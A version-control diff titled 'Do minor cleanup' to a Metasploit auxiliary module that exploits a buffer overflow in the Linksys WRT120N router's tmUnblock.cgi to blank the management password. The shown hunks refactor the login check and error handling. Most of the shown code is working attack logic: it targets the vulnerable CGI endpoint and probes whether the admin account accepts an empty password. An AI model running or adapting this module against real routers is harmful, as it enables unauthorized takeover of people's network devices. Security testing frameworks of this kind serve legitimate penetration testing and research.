Do minor cleanup
parent
b79197b8ab
commit
582372ec3e
|
@ -13,9 +13,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => 'Linksys WRT120N tmUnblock Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router.
|
||||
It is possible to reset the password of the management interface temporarily to an
|
||||
empty value. It was tested on a WRT120N firmware version 1.0.07.
|
||||
This module exploits a buffer overflow vulnerability in the WRT120N Linksys router
|
||||
to reset the password of the management interface temporarily to an empty value.
|
||||
This module has been tested successfully on a WRT120N device with firmware version
|
||||
1.0.07.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -32,35 +33,36 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'DisclosureDate' => 'Feb 19 2014'))
|
||||
end
|
||||
|
||||
def check_login(user,pass)
|
||||
def check_login(user)
|
||||
print_status("#{peer} - Trying to login with #{user} and empty password")
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/',
|
||||
'method' => 'GET',
|
||||
'authorization' => basic_auth(user,"")
|
||||
})
|
||||
if res.nil? or res.code == 404
|
||||
if res.nil? || res.code == 404
|
||||
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||
return false
|
||||
end
|
||||
if [200, 301, 302].include?(res.code)
|
||||
elsif [200, 301, 302].include?(res.code)
|
||||
print_good("#{peer} - Successful login #{user} and empty password")
|
||||
return true
|
||||
else
|
||||
print_status("#{peer} - No successful login possible with #{user} and empty password")
|
||||
return false
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
if (check_login("admin","") == true)
|
||||
|
||||
begin
|
||||
if check_login("admin")
|
||||
print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.")
|
||||
return
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("#{peer} - Failed to connect to the web server")
|
||||
return
|
||||
end
|
||||
|
||||
uri = '/cgi-bin/tmUnblock.cgi'
|
||||
|
||||
|
@ -93,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
})
|
||||
if res and res.code == 500
|
||||
if (check_login("admin","") == true)
|
||||
if check_login("admin")
|
||||
print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password")
|
||||
else
|
||||
print_status("#{peer} - Expected answer, but unknown exploiting status. Try to login with the user admin and a blank password")
|
||||
|
@ -102,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_error("#{peer} - Unexpected answer. Exploiting attempt has failed")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{peer} - Failed to connect to the web server")
|
||||
print_error("#{peer} - Failed to connect to the web server")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue